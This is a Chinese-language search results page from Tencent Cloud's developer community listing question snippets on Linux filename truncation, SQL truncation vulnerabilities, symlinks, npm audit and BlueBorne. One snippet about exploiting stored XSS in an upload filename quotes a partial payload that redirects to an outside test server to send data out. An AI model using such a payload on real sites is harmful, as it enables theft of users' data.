腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
SQL
截断
漏洞
、
、
我了解了我不知道的SQL
截断
漏洞
。我的理解是,此
漏洞
基于以下事实: MySQL
截断
“插入查询”的值,而该值是否超过相应列的宽度。此
漏洞
的第一次出现是在CVE-2008-4106中,它报告了WordPress CMS中的问题。CVE报告说,这个问题与WordPress实现有关。但我会说,这是一个与MySQL实现相关的问题,它
截断
输入,而不是引发错误和阻塞查询。 那么,在DBMS (MySQL)中还是在不检查字符串长度的web应用程序中,SQL
截断
漏洞
是一
浏览 0
提问于2014-06-27
得票数 2
2
回答
Linux
上的多行选项卡文本编辑器
、
、
、
我正在寻找文本编辑器,运行在
linux
上,支持多行标签栏,不
截断
长
文件名
。我通常在Windows中使用Notepad++。请给我推荐。谢谢。
浏览 5
提问于2013-10-24
得票数 2
1
回答
Symlink
文件名
-可能的
漏洞
?
、
、
我在我的一个托管网站中发现了一个
漏洞
,在该
漏洞
中,我可以给符号链接
文件名
源链接任何名称。不过,我无法控制目标目录链接。
linux
中允许在任何特定目录中创建多少符号链接? 谢谢
浏览 0
提问于2017-07-24
得票数 1
回答已采纳
1
回答
在
Linux
命令行中替代finfo(FILEINFO_MIME)->buffer()
、
、
、
您可以在
linux
中执行命令,而不是在文件上使用finfo来检索content-type $finfo = new finfo(FILEINFO_MIMEcontent-type,可以执行以下操作$content_type = $finfo->buffer($data); 但是,有没有其他方法可以在
linux
浏览 0
提问于2013-05-21
得票数 0
1
回答
python的很棒的CSV模块?
、
我正在自动化一项涉及电子表格中的
漏洞
的长任务。然而,我注意到这些
漏洞
的“建议”有时是相当长的。 在编写新行时,python的CSV模块似乎会
截断
其中的一些文本。有什么方法可以防止这种情况发生吗?我只是在建议(这是很多文本)的地方看到了“注意:这个字段被
截断
了”。
浏览 0
提问于2014-04-18
得票数 0
2
回答
文件名
的动态裁剪
这里的
Linux
新手。SOLO_PAL3.xyz.ino.WVC.csv -> renamed to WVC.csv
文件名
截断
浏览 0
提问于2021-04-12
得票数 0
回答已采纳
2
回答
批处理作业移除带有日期和时间戳的
文件名
中的时间戳
、
、
在一个文件夹中,我有许多
文件名
,如:JKL.MNO.PQR.YYYYMMDDhhmmsssABC.DEF.GHI.YYYYMMDD 如何在脚本批处理文件windows (而不是
Linux
)
浏览 5
提问于2020-08-07
得票数 0
回答已采纳
8
回答
如何在使用"npm审核“时只检查高
漏洞
?
、
、
75个
漏洞
发现4867个包已审计运行npm audit获取更多详细信息 谢谢
浏览 1
提问于2018-05-13
得票数 78
3
回答
不使用/利用
文件名
中的XSS
、
、
我试图利用文件上传的
文件名
字段中的
漏洞
进行攻击。web应用程序无法正确验证上传文件的
文件名
,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名文件以包含类似于下面的有效负载时,我就不能在
文件名
中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
3
回答
在
Linux
上,命令行程序mktemp是否不如C函数mkstemp安全?
、
、
、
这两个操作都会创建一个空文件并返回
文件名
,但是mkstemp会让文件以独占模式打开,并为您提供句柄。C-function有没有安全的好处?这是否意味着命令行版本中存在安全
漏洞
?顺便说一句,有趣的是,
Linux
上的C api中有几个相关函数,其中大多数函数在其手册页中都写着“不要使用此函数”(或类似的内容)。
浏览 1
提问于2009-01-31
得票数 2
回答已采纳
2
回答
如何处理不同的路径分隔符?
、
下面的代码使用\上的/路径分隔符和
Linux
上的/路径分隔符生成输出。但是,由于路径分隔符不同,这在
Linux
上无法工作。不仅如此,\\字符作为
Linux
文件名
的一部分也是有效的,该
文件名
可能会对此代码造成失败的
漏洞
。
浏览 4
提问于2017-06-15
得票数 3
回答已采纳
2
回答
细-Uploader
文件名
省略号,在哪里指定长度?
、
、
我的精细-Uploader工作很好,但我正在尝试鞋喇叭整个界面成一个非常狭窄的对话框,并需要调整长度,在
文件名
有省略号添加到他们的中间,以
截断
他们适合他们。目前,
文件名
正在被
截断
,但只有在它们变得非常长之后才会被
截断
。我看不出
文件名
的长度是在哪里确定的,使用的是什么机制。似乎没有使用文本溢出:省略css标记。 谢谢。
浏览 4
提问于2013-10-25
得票数 1
回答已采纳
2
回答
如何确定给定
漏洞
所需的最小
Linux
内核版本
、
我必须跟踪一个合法(3.12)
Linux
内核的
漏洞
。为此,我在NVD这样的网站上搜索新的
漏洞
。最近,我遇到了一个问题,该
漏洞
的受影响版本被描述为cpe:/o:
linux
:
linux
_kernel:4.4:rc8 and previous versions。但是,当我将LinuxKernelVersion3.12的源代码与针对该
漏洞
的修复进行比较时,我可以看到,导致该
漏洞
的修改已应用于较后版本。这就引出了一个问题: 有没有一种方法可以在不手动
浏览 0
提问于2016-03-30
得票数 4
1
回答
ActionDispatch::Http::UploadedFile中的original_filename方法安全吗?
在没有进一步消毒的情况下,使用original_filename方法在ActionDispatch::Http::UploadedFile中作为文件保存在主机系统中安全吗?
浏览 1
提问于2014-02-20
得票数 1
回答已采纳
8
回答
如何解析/proc/pid/cmdline
我试图在
Linux
上拆分进程的cmdline,但似乎不能依赖它由'\0‘字符分隔。你知道为什么有时'\0‘字符被用作分隔符,而有时它是一个常规空格吗?您是否知道检索可执行
文件名
称和路径的任何其他方法?我一直在尝试使用'ps‘获取此信息,但它总是返回完整的命令行,并且可执行文件的名称被
截断
。 谢谢。
浏览 7
提问于2009-10-19
得票数 21
11
回答
创建文件夹
、
假设该程序是以非特权用户的身份在现代
Linux
(或Windows )桌面系统上运行的。假设当前目录为$HOME/%USERPROFILE%。假设
文件名
只包含字符abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789。我是密码-高尔夫。
浏览 0
提问于2017-06-01
得票数 -2
1
回答
如何在
Linux
中使用目录参数和find命令(Fedora- 20)
、
、
、
我在
linux
终端中有下面的find命令这条命令什么都不还给我。编辑:有了这个调用,程序就不能很好地执行。
浏览 0
提问于2014-11-02
得票数 0
回答已采纳
1
回答
在多制表符vim中空间不足时,请
截断
文件名
的后面而不是前面
如果我没有足够的终端列来显示多选项卡vim会话中的所有
文件名
,它会
截断
文件名
的前面,以便将它们全部放入选项卡中: 没有足够的空间:正如你所看到的,它已经从前面
截断
了名字我是否可以反转此行为,使vim从名称的后面
截断
?
浏览 0
提问于2018-10-26
得票数 3
1
回答
如何保护
Linux
系统免受BlueBorne远程攻击?
、
、
、
、
Linux
披露了基于
Linux
的BlueBorne攻击操作系统中的两个
漏洞
,这些
漏洞
允许攻击者完全控制受感染的设备。第一个
漏洞
是信息泄漏
漏洞
,它可以帮助攻击者确定目标设备使用的确切版本,并相应地调整他的
漏洞
。第二种是堆栈溢出,可以导致设备的完全控制。此攻击不需要任何用户交互、身份验证或配对,使其
浏览 0
提问于2017-09-13
得票数 20
回答已采纳
2
回答
CVE的
漏洞
测试-2014-2483?
、
、
、
我正在使用
Linux
6/7操作系统在服务器上进行渗透测试。http://www.cvedetails.com/等
漏洞
数据库提到了
Linux
系统中JavaCVE-2014-2483的
漏洞
。我寻找方法,可以测试我的目的地的
漏洞
,但我没有找到任何东西。 如何测试服务器是否存在此
漏洞
?
浏览 0
提问于2015-05-10
得票数 2
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
linux-路径及文件名截取
各硬件设备在Linux中的文件名
安全杂谈——linux通配符绕过文件名黑名单
Linux内核出现漏洞
Linux用户注意了:Linux Sudo被曝漏洞
热门
标签
更多标签
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
活动推荐
运营活动
广告
关闭
领券